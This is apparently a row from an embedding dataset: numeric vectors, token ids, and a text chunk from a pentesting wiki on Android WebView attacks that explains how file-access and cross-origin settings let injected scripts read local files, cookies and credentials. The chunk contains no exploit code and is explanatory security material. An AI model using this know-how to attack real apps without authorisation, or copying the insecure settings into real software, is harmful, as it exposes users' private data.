0.1008017286658287, -0.18805360794067383, 0.46588197350502014, 0.47822096943855286, 0.06452953815460205, -1.0841013193130493, 0.04110727459192276, -0.35025420784950256, 0.8986476063728333, 0.849605143070221, 0.8744144439697266, 0.1981823742389679, 0.5875115394592285, 0.09465623646974564, 0.5406301021575928, -0.9003512859344482, -0.27433109283447266, -0.4763583242893219, 0.9288918375968933, -0.8252695202827454, -0.41765180230140686, -0.7938048839569092, -0.08317231386899948, -0.5566322803497314, 0.07683070003986359, 0.005986040458083153, 0.24302874505519867, -0.8206492066383362, 0.003721838351339102, 0.4117530584335327, 0.39120879769325256, 0.08943109214305878, -0.14025399088859558, -0.4817589223384857, 0.22043776512145996, 1.1413028240203857, 0.19298316538333893, -0.2086937129497528, -0.7003639936447144, 0.41857486963272095, 0.5289314985275269, -0.47356659173965454, -0.6907269358634949, -0.2649995982646942, -0.382492333650589, -1.2611970901489258, 0.6929951310157776, 0.8854485154151917, -0.3815050423145294, 0.19297808408737183, -0.7075744867324829, 0.04953128099441528, 0.5952634215354919, -0.7552716732025146, -0.8782316446304321, -0.39469990134239197, 0.6476788520812988, 0.3198263347148895, 0.25068995356559753, -0.10767849534749985, 0.12699174880981445, 0.36216893792152405, -1.1376235485076904, 0.7285545468330383, -0.9294636249542236, -0.06669174134731293, -0.08990796655416489, 0.9088538885116577, -0.3957561254501343, 0.7730952501296997, 0.09725531935691833, 0.2639535069465637, 0.07988344877958298, 0.028572484850883484, -0.21247199177742004, -0.12749195098876953, 0.3702421486377716, -0.031235991045832634, 0.5312334895133972, 0.11971688270568848, 0.25463131070137024, 0.30667170882225037, 0.7521504163742065, 0.13235707581043243, -0.9066746234893799, 0.11775394529104233, -0.09858112037181854, 0.3878277540206909, 0.25234636664390564, -0.31913864612579346, 0.5887621641159058, -0.8530208468437195, 0.5585247874259949, 0.4185698926448822, 0.03189610689878464, -1.1352708339691162, -0.714997410774231, 0.15561044216156006, 0.14061373472213745, -0.0656973272562027, 0.7135838866233826, 0.5728088021278381, 0.12300138175487518, 0.4799017012119293, 0.09785904735326767, 0.24954955279827118, -0.5094131827354431, -0.25578248500823975, -0.1533249020576477, 0.1678176075220108, -0.4147038757801056, 0.6247877478599548, 0.19423611462116241, -0.6849528551101685, 0.314423143863678, 0.05390913039445877, -0.08600731194019318, -0.5586309432983398, 0.4645857810974121, 0.07809239625930786, -0.4087194800376892, 0.24115543067455292, 0.24274370074272156, -0.7130385637283325, 0.06747538596391678, 0.990571916103363, 0.22325961291790009, 0.6806905269622803, -0.21067877113819122, -0.4973646402359009, 0.29047754406929016, 0.3077320456504822, -0.5534557104110718, -0.46257472038269043, 0.12041173130273819, -0.3283415138721466, -0.07489962130784988, 0.13990260660648346, -0.4211590588092804, -0.7286707162857056, 0.12864558398723602, 0.5446265339851379, -0.8711562156677246, -0.6088125109672546, -0.4966028928756714, 0.12647375464439392, -0.08174630254507065, 0.7016338109970093, -0.17134203016757965, -0.1556784063577652, 0.05326104909181595, -0.23693622648715973, 0.10853063315153122, -0.25861185789108276, 0.12410599738359451, 0.11850863695144653, -0.4094594120979309, 0.013825049623847008, 0.5274044275283813, 0.5531899333000183, -0.26192378997802734, 0.03706623613834381, -0.10193344950675964, 0.058295972645282745, 0.01045369915664196, -0.11700240522623062, -0.056262847036123276, -0.8741891980171204, 0.5175520181655884, -0.14881210029125214, 1.0541038513183594, -0.5642357468605042, -0.039940185844898224, -0.23179054260253906, 0.3312367796897888, -0.8432994484901428, 0.46387776732444763, -0.09716629236936569, -0.12528853118419647, 0.3917805254459381, -0.05854640528559685, -0.19972775876522064, -0.24046219885349274, 0.39157748222351074, -0.3558492064476013, 0.09652262926101685, -0.7014581561088562, -0.08872377872467041, -0.9710060358047485, -0.6550074219703674, 0.5678650736808777, -0.20945194363594055, 0.0763118788599968, -0.4026721119880676, -0.6533026099205017, 0.18040533363819122, 0.07561102509498596, -0.03922189399600029, 0.5836617946624756, -0.2524034380912781, -0.4383099675178528, -0.0030521927401423454, 0.16431063413619995, 0.43681320548057556, -0.40774667263031006, -0.12597902119159698, 0.21452774107456207, 0.1785714477300644, -0.19591525197029114, -0.6301607489585876, 0.15893372893333435, -0.5491769313812256, 0.39933863282203674, 0.19544728100299835, -0.8571986556053162, 0.3383241891860962, -0.15180617570877075, -0.7345250248908997, -0.07884938269853592, 0.8108614087104797, -0.13622447848320007, 0.6727819442749023, 0.5053077936172485, 0.3169313669204712, -0.11943981796503067, 0.8450787663459778, -0.04194009304046631, -0.5915578603744507, -0.3462265729904175, 0.8116273283958435, 0.32577085494995117, -0.48028793931007385, 0.09254258126020432, 0.1365748792886734, -0.6586963534355164, -0.5197541117668152, 0.020762993022799492, -0.08208886533975601, -0.010599931702017784, -0.017470523715019226, -0.6382688283920288, -0.31504833698272705, -0.762183427810669, 0.28632667660713196, 0.4407380521297455, 0.26065173745155334, -0.198197603225708, -0.0459836907684803, 0.960306704044342, -0.6165210008621216, -0.012847112491726875, 0.4599572420120239, -0.01779225841164589, -0.7102025747299194, -0.6059157252311707, -0.1114402711391449, -0.6071746945381165, 0.1418861448764801, 0.7916169762611389, -0.06528022140264511, 0.11104605346918106, 0.6893016695976257, -0.15300795435905457, 0.8187419176101685, -0.4425191581249237, 0.3293575346469879, 0.8327416777610779, -0.8499952554702759, -0.6494285464286804, -0.3110142946243286, 0.2034536600112915, 0.24070574343204498, -0.04549528285861015, -0.6142981052398682, 0.35865241289138794, 0.22055476903915405, 0.5241463780403137, -0.35511788725852966, -0.5214880704879761, -0.2643715739250183, 0.02177705056965351, 0.004097263794392347, -0.5351797938346863, -0.1901259571313858, 0.1828204095363617, 0.20113518834114075, -0.5034900307655334, -0.6376465559005737, 0.2131466269493103, -0.16165807843208313, 0.0036645240616053343, -0.01857707090675831, -0.25752291083335876, 0.21583950519561768, -0.4864322543144226, -1.046082854270935, -0.07711630314588547, -0.2330973744392395, -0.6681045293807983, -0.2986881732940674, -0.4723447859287262, -0.37195613980293274, -1.1061413288116455, 0.5681875348091125, -0.3426336348056793, 0.21055538952350616, -0.5071783065795898, -0.08170728385448456, -0.8155297636985779, 0.0864972174167633, 0.04002668336033821, 0.5681207180023193, 0.19870038330554962, -0.01081130001693964, 0.05006003379821777, -0.03412554785609245, -0.1968904584646225, -0.2345043271780014, -0.367892324924469, -0.08385259658098221, 0.24537567794322968, -0.5950807929039001, 0.4908170998096466, -0.010001209564507008, -0.21799133718013763, 0.07783060520887375, -0.8215093612670898, -0.3738045394420624, 0.2964121699333191, 0.37845292687416077, 0.037176333367824554, -0.025296397507190704, 0.32751405239105225, 0.7402774691581726, -0.20628099143505096, 0.4997410774230957, 0.06726060807704926, 0.06945955008268356, 0.6437516212463379, -0.36509308218955994, 0.4801137447357178, -0.07468143105506897, 0.5521112680435181, 0.3667890429496765, 0.47462475299835205, 0.419540673494339, 0.10979766398668289, -0.0044898297637701035, -0.28885960578918457, 0.5221109390258789, -0.7483507394790649, 0.11979664117097855, 0.41536369919776917, 0.2753046154975891, -0.1532191038131714, 0.3843032717704773, -0.3894137442111969, 0.34593382477760315, -0.8796653151512146, -0.32973724603652954, 0.39603370428085327, -0.5947719812393188, -0.6199766397476196, -0.45153653621673584, -0.15019893646240234, -0.7363637685775757, 0.4020618796348572, -1.0252373218536377, 0.29371267557144165, 0.8365976214408875, 0.6930400133132935, 1.0181283950805664, -0.22949066758155823, 0.5010012984275818, -0.5452409982681274, 0.13406157493591309, -0.7985761761665344, -0.9439204931259155, 0.35099995136260986, 1.1548845767974854, -0.26084384322166443, -0.6500576734542847, -1.1903717517852783, -0.40277519822120667, 0.2607198655605316, -0.3059249818325043, 0.35254645347595215, -0.04751158133149147, -1.9028044939041138, 0.26809200644493103, -0.07958029955625534, 0.33293482661247253, 0.38481825590133667, 0.0190136656165123, -0.2465185672044754, 0.08301761746406555, 0.44093093276023865, 0.071936696767807, 0.5462645292282104, -0.232937291264534, 0.2024013102054596, -0.07014176994562149, 1.1007906198501587, -0.5192928314208984, -0.4855425953865051, 0.07342137396335602, 0.5537152290344238, 0.6662905216217041, 0.07862289249897003, 0.04557610675692558, 0.04594901204109192, 0.05891014263033867, -0.41234755516052246, 0.3033646047115326, 0.7179050445556641, -0.6136190891265869, -0.4432315528392792, 0.3911910653114319, -0.4337742328643799, -0.1550668329000473, 0.03720749914646149, -0.6066970229148865, -0.2786368131637573, -0.32269859313964844, 0.1460484266281128, -0.09777531772851944, 0.048197124153375626, 0.6703617572784424, -0.7494584918022156, 0.27183592319488525, -0.6440396904945374, 0.20910482108592987, 1.1653504371643066, 0.45681264996528625, -0.4329933226108551, -0.1865612417459488, 0.9136519432067871, 0.7967557311058044, -0.7349891662597656, 0.5562911629676819, -0.4413869380950928, -0.03715080767869949, -0.37109264731407166, 0.3039839267730713, 0.27332407236099243, -0.24790415167808533, 0.19000862538814545, -0.41483232378959656, 0.008051359094679356, 0.46167460083961487, -0.42780113220214844, -0.5227524638175964, 0.6557191014289856, -1.0056108236312866, 0.1154857948422432, -0.26180359721183777, 0.15022313594818115, -0.363162100315094, -0.9448619484901428, 0.19982610642910004, -0.2519665062427521, -0.3224409520626068, 0.05632556229829788, -0.3716793358325958, 0.019050056114792824, -0.1763048768043518, 0.6079220771789551, -0.19373372197151184, 0.9542388319969177, -0.5371325016021729, -0.29031622409820557, -0.4114316999912262, -0.1492285281419754, -0.33269983530044556, 0.0520746111869812, -1.0848641395568848, -0.046182215213775635, 0.7385074496269226, 0.06620796024799347, -0.6868664026260376, 0.03369257599115372, 0.1507449746131897, -0.220119446516037, -0.8417044281959534, 0.4876704216003418, 0.7419030666351318, -0.4360550045967102, 0.27679792046546936, 0.7299715876579285, -0.5052662491798401, 0.3572816550731659, -0.6714553236961365, -0.09456425160169601, -0.5449545979499817, -0.2712571322917938, -0.7185088992118835, 0.983018696308136, -0.5235257148742676, -0.5146127343177795, -0.07115762680768967, -0.9598435759544373, -0.017340760678052902, -0.463146835565567, 0.17053788900375366, -0.20119532942771912, 0.3420184850692749, 0.4014278054237366, 0.6619692444801331, 0.35274332761764526, -0.3435543477535248, 0.4130631983280182, 0.3481954038143158, 0.715657651424408, 0.05885101109743118, 0.7225880026817322, 0.41235458850860596, -0.22347283363342285, 0.320402592420578, 1.071446418762207, 0.6873915195465088, -0.24724914133548737, 0.4496598243713379, -0.27303194999694824, 0.48589158058166504, -0.6340295076370239, 0.1301490068435669, -0.10504736751317978, 0.5692327618598938, -0.4056009352207184, 0.05465611815452576, -0.3787071108818054, -0.04158257693052292, -1.0434898138046265, 0.29275497794151306, -0.13985055685043335, -1.1382346153259277, 0.05496297776699066, 0.2132355272769928, 0.1456090211868286, -0.9885254502296448, 4.388518333435059, 0.35670825839042664, 0.21943989396095276, 0.5467880964279175, 0.25176724791526794, 0.5165275931358337, 0.7036594748497009, -0.36284929513931274, -0.32560163736343384, -0.3424191474914551, 0.6035995483398438, -0.3174075186252594, 0.30464038252830505, 0.4387627840042114, -0.09370419383049011, 0.0060109286569058895, -0.25455227494239807, 0.061907000839710236, 0.6326743960380554, -0.6272836923599243, -0.17936795949935913, 0.6966614127159119, 0.2746872901916504, 0.510470449924469, 0.37304797768592834, 0.8786153197288513, -0.07138729840517044, 0.2724328339099884, -0.1987065225839615, -0.2271379828453064, 0.25989988446235657, -0.43973925709724426, 0.7943191528320312, -0.7436680197715759, -0.1324319988489151, 0.9623579978942871, 0.3562910556793213, -0.3321513533592224, -0.2708350121974945, 0.0944196954369545, 0.5482304096221924, 0.18186159431934357, -0.7291918396949768, -0.23341761529445648, 0.23900753259658813, 0.3803997337818146, 0.18116380274295807, -1.0091413259506226, 0.8103814721107483, -0.7167066335678101, 0.007321443874388933, -0.29409635066986084, 0.6001877188682556, 0.34532594680786133, -0.2721368670463562, -0.19161193072795868, -0.08714548498392105, 0.10763747990131378, 0.43010905385017395, -0.10235681384801865, 0.05135558173060417, 0.118657186627388, -0.470577597618103, -0.02129780687391758, -0.8189342021942139, -0.01445156428962946, 0.16370582580566406, 0.6171005368232727, 0.16600348055362701, -0.1090712696313858, 0.7103408575057983, -0.5958800911903381, 0.038911882787942886, -0.6387383937835693, 0.36500704288482666, 0.6795122027397156, 0.8224344849586487, 0.6643404364585876, 0.31731900572776794, -0.33652058243751526, 0.08328771591186523, -0.02896842733025551, 0.18300621211528778, -0.34057900309562683, 1.0252606868743896, 0.6326499581336975, -0.568321943283081, 0.14171209931373596, -0.16068792343139648, 0.009000523015856743, 0.652042031288147, 0.15920963883399963, -0.09142381697893143, -0.8733033537864685, 0.7468615770339966 ]
[ 2243, 1011, 4130, 1013, 5198, 1013, 5310, 18442, 1013, 3075, 1013, 11924, 1013, 17371, 2243, 11709, 2000, 3443, 1037, 24391, 4646, 2000, 3231, 2005, 2825, 11112, 17364, 2075, 24728, 19666, 6906, 14680, 1012, 1996, 10210, 13340, 3508, 2003, 4659, 3722, 2004, 1996, 9722, 2089, 5454, 2025, 2000, 4374, 3543, 2824, 2043, 1037, 3193, 2003, 3139, 2011, 2178, 1012, 2478, 1996, 11924, 9722, 1521, 1055, 4431, 1024, 2823, 2009, 2003, 6827, 2008, 2019, 4646, 2022, 2583, 2000, 20410, 2008, 2019, 2895, 2003, 2108, 2864, 2007, 1996, 2440, 3716, 1998, 9619, 1997, 1996, 5310, 1010, 2107, 2004, 15080, 1037, 6656, 5227, 1010, 2437, 1037, 5309, 2030, 22042, 2006, 2019, 15147, 1012, 6854, 1010, 1037, 24391, 4646, 2071, 3046, 2000, 11867, 21511, 1996, 5310, 2046, 4488, 2122, 4506, 1010, 11499, 1010, 2011, 19819, 2075, 1996, 3832, 3800, 1997, 1996, 3193, 1012, 2004, 1037, 19519, 1010, 1996, 7705, 4107, 1037, 3543, 22910, 7337, 2008, 2064, 2022, 2109, 2000, 5335, 1996, 3036, 1997, 5328, 2008, 3073, 3229, 2000, 7591, 15380, 1012, 2000, 9585, 3543, 22910, 1010, 2655, 2275, 8873, 21928, 24826, 8376, 2860, 10222, 16429, 28817, 5596, 1006, 22017, 20898, 1007, 2030, 2275, 1996, 11924, 1024, 11307, 24826, 8376, 2860, 10222, 16429, 28817, 5596, 9621, 17961, 2000, 2995, 1012, 2043, 9124, 1010, 1996, 7705, 2097, 5860, 4232, 12817, 2008, 2024, 2363, 7188, 1996, 3193, 1005, 1055, 3332, 2003, 23649, 2011, 2178, 5710, 3332, 1012, 2004, 1037, 2765, 1010, 1996, 3193, 2097, 2025, 4374, 12817, 7188, 1037, 15174, 1010, 13764, 8649, 2030, 2060, 3332, 3544, 2682, 1996, 3193, 1005, 1055, 3332, 1012, 102 ]
hack_tricks
426.txt
1
[CLS] webview attacksinteresting configurationsyou can identify an exposed webview like this : file accesswebview file access is enabled by default. since api 3 ( cupcake 1. 5 ) the method setallowfileaccess ( ) is available for explicitly enabling or disabling it. if the application has _ android. permission. read _ external _ storage _ it will be able to read and load files from the external storage. the webview needs to use a file url scheme, e. g., file : / / path / file, to access the file. universal access from file url ( deprecated ) sets whether cross - origin requests in the context of a file scheme url should be allowed to access content from any origin. this includes access to content from other file scheme urls or web contexts. note that some access such as image html elements doesn't follow same - origin rules and isn't affected by this setting. don't enable this setting if you open files that may be created or altered by external sources. enabling this setting allows malicious scripts loaded in a file : / / context to launch cross - site scripting attacks, either accessing arbitrary local files including webview cookies, app private data or even credentials used on arbitrary web sites. in summary this will prevent loading arbitrary origins. the app will send the url request lo load the content with origin : file : / / if the response doesn't allow that origin ( access - control - allow - origin : file : / / ) then the content won't be loaded. the default value is false when targeting build. version _ codes. jelly _ bean and above. use getallowuniversalaccessfromfileurls ( ) to know whether javascript running in the context of a file scheme url can access content from any origin ( if universalaccessfromfileurl is enabled ). use setallowuniversalaccessfromfileurls ( boolean ) to enable / disable it. using loaddatawithbaseurl ( ) with null as baseurl will also prevent to load local files even if all the dangerous settings are enabled. file access from file urls ( deprecated ) sets whether cross - origin requests in the context of a file scheme url should be allowed to access content from other file scheme urls. note that some accesses such as image html elements don't follow same - origin rules and
[ 0.04868714511394501, -0.08091156929731369, -0.2984560430049896, 0.14758074283599854, -0.2256438136100769, 0.3051702380180359, 0.24954365193843842, 0.19109144806861877, 0.7587308883666992, 1.1075546741485596, -0.32040637731552124, 0.08461100608110428, 0.45361247658729553, -0.09986089169979095, -0.6336284279823303, -0.21366925537586212, -0.4024590253829956, 0.3219923675060272, -0.31565436720848083, 0.14168095588684082, 0.34797582030296326, 0.5836636424064636, -0.551862895488739, -1.1266920566558838, -0.19802117347717285, 0.14209140837192535, 0.4443587064743042, -0.10515856742858887, 0.8109458684921265, 1.1776540279388428, 0.17590025067329407, 0.11588621139526367, -0.39712709188461304, -0.21412256360054016, -0.12362774461507797, -0.40765756368637085, 0.849156379699707, -0.1921013593673706, 0.2952241897583008, -0.8465349674224854, 0.48466938734054565, -0.1840503215789795, 0.09399805217981339, -0.13685087859630585, -0.12402055412530899, -0.5277632474899292, 0.8133038878440857, -0.035483427345752716, 0.03286276385188103, 0.11698541045188904, 0.4202607274055481, 0.3663504421710968, 0.0711943507194519, -0.6182499527931213, 0.15746280550956726, -0.1528528779745102, -0.3591107130050659, -0.3310297429561615, -0.3285945951938629, 0.21267801523208618, 0.09949681907892227, 0.5180882215499878, 0.5323620438575745, -0.500312089920044, 0.31233006715774536, 0.8053759932518005, 0.06292042136192322, -0.7544160485267639, -0.20869337022304535, -0.41146063804626465, -0.6474204063415527, 0.738021194934845, -1.0188353061676025, -0.5840432643890381, -0.4305357336997986, -0.025118215009570122, -0.8360347151756287, -0.07048987597227097, 0.6394585371017456, 0.30176404118537903, 0.13987699151039124, 0.4188927412033081, 0.2484034299850464, -0.3040464222431183, -0.17939618229866028, -0.3285357356071472, 0.5559684634208679, 0.7882072925567627, -0.8994884490966797, 0.46542954444885254, -0.38498860597610474, 0.6197145581245422, -1.3244572877883911, -0.5547164678573608, 0.36493659019470215, 1.0645902156829834, -0.027949968352913857, -0.3141169250011444, 0.32586994767189026, -0.43735939264297485, 0.3909653425216675, 0.9531170129776001, -0.05296795070171356, 0.22666124999523163, -0.4335482120513916, 0.5300208926200867, 0.0024662294890731573, -0.3460279405117035, -0.9050688743591309, -0.6329365968704224, 0.28372564911842346, -0.4168664813041687, 0.3167285919189453, -0.8906998038291931, 0.45284149050712585, 0.4048258364200592, 0.09156429022550583, 0.11595851182937622, -0.2597183585166931, 0.26748836040496826, 0.20340374112129211, 0.23050886392593384, 0.019182855263352394, -0.1323772370815277, 0.22879453003406525, 0.1767367273569107, 0.4946386516094208, 0.5274747610092163, 0.0014208935899659991, -0.24223123490810394, 0.11650187522172928, -0.14050565659999847, 0.10824791342020035, 1.024167537689209, -0.8573130369186401, 0.05341697111725807, 0.25305309891700745, 0.23169469833374023, 0.2355896234512329, -0.5702954530715942, -0.21863436698913574, 0.9015395641326904, 0.1554049253463745, 1.0713047981262207, 0.0016700433334335685, 0.44974443316459656, -0.3482059836387634, -0.40450721979141235, -1.1646647453308105, 0.3714885115623474, 0.3313605785369873, 0.3830065131187439, 0.5767302513122559, -0.0930231362581253, -0.24120202660560608, -0.005698183551430702, -0.5597555637359619, 0.4163658916950226, 0.20294326543807983, -0.5187602043151855, -0.4692028760910034, 0.841454267501831, 0.04788779094815254, 0.45279252529144287, -0.09465836733579636, 0.24208323657512665, -0.7330055236816406, -0.6066485047340393, -0.15131475031375885, 0.03218169882893562, -0.055018048733472824, 0.6494821906089783, 0.24326515197753906, 0.5720855593681335, 1.260698914527893, 0.9163456559181213, -0.24671567976474762, -0.34842896461486816, 0.1272013932466507, 0.29718437790870667, -0.4860689342021942, 0.16012419760227203, 0.9647220969200134, 0.8425697088241577, -0.8384769558906555, 0.5512676239013672, -0.27275440096855164, -0.6788816452026367, 0.030612872913479805, -0.39673691987991333, -0.3943268358707428, 0.5462698340415955, -0.670192539691925, 0.6925820112228394, 0.6643919944763184, 0.33771780133247375, -1.1999626159667969, -0.5710892081260681, -0.23674239218235016, -1.1052004098892212, -0.416377454996109, -0.07093966007232666, -0.3213312327861786, 0.36908531188964844, 0.30538949370384216, -0.44184601306915283, 1.1030703783035278, 0.3511731028556824, 0.060602545738220215, 0.2705982029438019, 0.8864582180976868, 0.19543753564357758, -0.5992408394813538, -0.19210892915725708, 0.9187327027320862, 0.07154783606529236, -0.4535132646560669, -0.05027894675731659, 0.016853246837854385, 0.034603051841259, -0.2465134710073471, 0.5669540166854858, 0.6365532875061035, 0.2922925651073456, -0.40106329321861267, 0.14839109778404236, -0.18284839391708374, -0.08021450787782669, 0.14692261815071106, 0.6235915422439575, -0.15722313523292542, 0.2841658592224121, 0.37957900762557983, 1.1467028856277466, 0.1645137071609497, 0.04567207396030426, -0.21109819412231445, 0.20043939352035522, 0.45205003023147583, -0.1897561103105545, 0.17113016545772552, 0.9924482107162476, 0.6921590566635132, 0.3524493873119354, 0.4742598831653595, 0.3286454379558563, -0.28614136576652527, 0.34327027201652527, 0.027848921716213226, 0.3088565170764923, 0.45770344138145447, 0.49153420329093933, 0.4208923280239105, -0.5982445478439331, -0.9774384498596191, -0.33493608236312866, 0.4702189266681671, 0.5255263447761536, -0.3419239819049835, -0.8917068839073181, -0.5268424153327942, 0.14501413702964783, 0.20227505266666412, -0.29840347170829773, 0.3990851640701294, 0.7417928576469421, -0.1920274943113327, 0.5778514742851257, -0.5311319231987, -0.3063596189022064, -0.8514733910560608, 0.19252827763557434, -0.9434595108032227, -0.21315932273864746, -1.2450045347213745, -0.49134013056755066, 0.13676629960536957, -0.42814213037490845, 0.764347493648529, -0.45947855710983276, 0.06996534764766693, 0.0716698169708252, 0.014916005544364452, 0.4693322777748108, 0.0742240771651268, 0.2849651873111725, -0.9332576990127563, -0.20541994273662567, 0.20513714849948883, 0.13385537266731262, -0.906934916973114, -0.012650412507355213, -0.25008171796798706, -0.035565562546253204, -0.2551887631416321, -0.09624160081148148, 0.48920631408691406, 0.5310379862785339, -0.18369396030902863, -0.05160949006676674, -0.03955099731683731, -0.2636461853981018, 0.015211782418191433, 0.43573126196861267, -0.06933460384607315, 0.19818824529647827, 0.17724354565143585, -0.14805743098258972, 0.32140523195266724, 0.4914630353450775, -0.6488751769065857, 0.22098033130168915, -0.15221914649009705, 0.4906453490257263, -0.3442416191101074, 0.5005803108215332, 0.7414980530738831, 0.44872626662254333, 0.1925526112318039, -0.27359655499458313, 0.41904759407043457, -0.5967211127281189, -0.11327444016933441, -0.03283112496137619, -0.11005623638629913, 0.43326646089553833, -0.2667112350463867, -1.0727169513702393, -0.04189549386501312, -0.46716296672821045, -0.20027777552604675, -0.5664725303649902, -0.28672581911087036, 0.7831312417984009, 0.33090952038764954, 0.4060167074203491, 0.39929673075675964, -0.2860637903213501, 0.11887385696172714, -0.2938578724861145, 0.0026385081000626087, -0.7917838096618652, 0.6891807317733765, 0.09012140333652496, -0.15524442493915558, 0.5434158444404602, 0.5801857709884644, -0.21524430811405182, 0.27648240327835083, -0.39050957560539246, -0.7095857858657837, -0.1093018651008606, 0.11520134657621384, -0.4630315601825714, 0.04086708277463913, 0.045117609202861786, -0.3527173399925232, 0.2053341567516327, -0.3997156620025635, 0.6055660247802734, 1.2828608751296997, 0.19767318665981293, 0.3004738390445709, -0.05583078786730766, -0.23378001153469086, -0.3888391852378845, 0.2232612818479538, 0.39207175374031067, 0.5285621285438538, -0.015456301160156727, 0.4724786579608917, -0.5886192917823792, 0.08160460740327835, 0.4646357595920563, 0.05588088557124138, -0.47016122937202454, 1.1818723678588867, 0.09657519310712814, 0.4225126802921295, -0.6219346523284912, 0.17961730062961578, -0.3167080581188202, -0.13480894267559052, 0.6663888096809387, 0.06240672245621681, -0.10932402312755585, -0.2420056015253067, -0.029292715713381767, 0.24605393409729004, 0.2346465140581131, 0.028268437832593918, -0.014924605377018452, 0.46648338437080383, -0.16753290593624115, -0.6342182755470276, -1.0193119049072266, 0.2505679726600647, 0.9176583290100098, 0.46500343084335327, 0.07957246154546738, 0.5981158018112183, 0.5553704500198364, -0.021265875548124313, 0.2752908766269684, -0.6764318346977234, 0.07147996872663498, -0.3386786878108978, 0.4008130133152008, 0.08799393475055695, 0.18423962593078613, -0.36706632375717163, -0.23574712872505188, -0.4676205515861511, 0.04796532168984413, 0.5350184440612793, 0.275687575340271, -0.42856669425964355, -0.6170802116394043, 0.45570066571235657, -0.10932004451751709, -0.4931793212890625, -0.5947068333625793, 0.10405376553535461, 0.6180500984191895, 0.6084588766098022, -0.06180456280708313, -0.32510435581207275, -1.1360220909118652, 0.33188489079475403, 0.29869624972343445, 0.1072884351015091, -0.1707921028137207, -1.1065291166305542, -0.7773309350013733, -0.3436950743198395, 0.7301264405250549, 0.7102397680282593, 0.22656585276126862, -0.13048605620861053, -1.0732324123382568, 0.17220106720924377, 0.21409466862678528, -0.22592289745807648, -0.4205455780029297, -0.1484183520078659, -0.062170036137104034, 0.3083264231681824, 0.3759889602661133, -0.5630501508712769, 0.16046090424060822, -0.14928893744945526, -0.7933335304260254, 1.5805919170379639, -0.5410120487213135, -0.23610344529151917, 0.025770341977477074, -0.05844078212976456, -0.019027400761842728, 0.35551923513412476, -0.9192431569099426, -0.06933706253767014, -0.36454370617866516, -0.527931809425354, 0.031623855233192444, -0.33362725377082825, 0.5556177496910095, -0.30996230244636536, -0.21465836465358734, 0.41040846705436707, 0.1968047022819519, 0.06628446280956268, 0.5540695786476135, -0.3462387025356293, -0.8952076435089111, 0.6463586688041687, -0.9973058700561523, 0.32161709666252136, 0.3070845901966095, -0.6725976467132568, -0.35004526376724243, -0.36292698979377747, 0.45534461736679077, -0.08835303038358688, 0.23289568722248077, -0.3719244599342346, -0.2100849151611328, 0.3985247015953064, -0.2597820460796356, 0.22945226728916168, 1.1294466257095337, 0.2543523609638214, 0.22438226640224457, -0.3952634632587433, -0.23108579218387604, -0.37172821164131165, -0.5537276268005371, -0.0489715151488781, 0.1299789547920227, 0.1934031993150711, -0.43925410509109497, 0.6444620490074158, -0.43067145347595215, -0.4009286165237427, -0.26014313101768494, 0.01363998744636774, 0.340024471282959, -1.035972237586975, -0.6149190068244934, -0.34669774770736694, -0.0570962056517601, 0.16409210860729218, 0.3514650762081146, -0.36970824003219604, 0.05063444375991821, -0.016632696613669395, 0.8970221877098083, 0.19320276379585266, -0.5098274946212769, 0.14373841881752014, 0.1834104061126709, 0.17782382667064667, -0.15941354632377625, 0.4669146239757538, 0.45139631628990173, -0.38746559619903564, 0.06504914164543152, 0.01294473372399807, -0.1843627542257309, -0.6015691161155701, -1.1088366508483887, -0.4141017496585846, -0.2372206747531891, 0.5554353594779968, 0.1208101436495781, -0.32525014877319336, -0.9836848378181458, 0.6673938035964966, -0.2764730453491211, -0.47096580266952515, 0.5914694666862488, -0.12247304618358612, 0.5393203496932983, -0.08012367784976959, -0.23060868680477142, -0.9119584560394287, -0.37942323088645935, 0.6620746850967407, 0.1122763380408287, -0.13553887605667114, 0.019166501238942146, -0.08825036138296127, 0.2966284453868866, 0.6733342409133911, 0.19181326031684875, -0.747225284576416, -0.5205193161964417, -0.1874639391899109, -0.10489645600318909, -0.7182915806770325, 0.3657352924346924, -1.0197136402130127, 0.5424942970275879, -0.09920988231897354, 0.3157671391963959, 0.024076588451862335, -0.437481164932251, -0.10504098981618881, 0.3062450587749481, 0.6522490978240967, -0.5677062273025513, 0.23382006585597992, -0.05412363260984421, 0.6888754367828369, 0.43977847695350647, -0.4320421516895294, -0.5170004367828369, 0.6439914703369141, -0.44400349259376526, -1.103562355041504, 0.5600814819335938, -0.27027928829193115, -0.5273628830909729, -0.6003968119621277, -0.6199994087219238, 0.32578152418136597, 0.11863928288221359, -0.16590024530887604, 1.1599191427230835, -0.1552368551492691, -0.05741991847753525, -0.13061027228832245, 0.33409014344215393, 0.40433642268180847, -0.16310910880565643, -0.1514553278684616, -0.499979704618454, -0.036817990243434906, 0.060722365975379944, -0.25128206610679626, -0.49770522117614746, -1.0494742393493652, -0.2582366466522217, 0.5826466083526611, -0.7160528898239136, 0.5533856153488159, -0.003330149222165346, -0.533992350101471, -0.05007786676287651, 0.017977014183998108, -0.056515928357839584, -0.15023858845233917, 0.7097309827804565, 0.7763810753822327, 0.14153072237968445, 0.10737363249063492, -0.45535290241241455, -0.3632083535194397, -0.24143445491790771, 0.8593959808349609, -0.818236231803894, -0.28951510787010193, 0.6057845950126648, 0.154792919754982, -0.6792304515838623, -0.5935732126235962, -1.0578320026397705, 0.14821550250053406, 0.5562349557876587, 0.05813334509730339, 0.021379726007580757, 0.32399874925613403, 0.32591941952705383, 0.03467760980129242, 0.6407478451728821, 0.43365994095802307, 0.2001221925020218, 0.0651794821023941, 0.28335392475128174, 0.5193575620651245, -0.03254943713545799, 0.19554460048675537, -0.6183252930641174, -0.35056379437446594, -0.463064581155777, 0.5855880975723267, 0.47309762239456177, 0.001971182879060507, 1.00978422164917, -0.7941506505012512, -0.00951268058270216, -0.7144335508346558, 0.6447547674179077, 0.49827975034713745, -0.1483176052570343, -0.2574615776538849, 0.9520760178565979, 0.08087550848722458, -0.4734284579753876, -0.1944350153207779, 0.47440433502197266, 0.4301639795303345, -0.08262040466070175, -0.7689752578735352, 0.3680984377861023, 0.07435472309589386, 0.22695763409137726, -0.24317388236522675, -0.4422912299633026, -0.6033923625946045, -0.8419238924980164, 0.17427092790603638, -0.00047339656157419086, 0.34275510907173157, 0.13931338489055634, 0.1707230657339096, -0.38213300704956055, -0.6008513569831848, -0.28761523962020874, -0.02501739375293255, -0.22719568014144897, -0.07809877395629883, -0.7652414441108704, 0.11351603269577026, -0.6337142586708069, -1.0754039287567139, -0.4286840856075287, -0.6175588369369507, -0.06488803774118423, -0.7800682783126831, -0.4124491810798645, -0.004809415899217129, -1.221261739730835, -0.026684075593948364, -0.40378230810165405, 0.355192095041275, 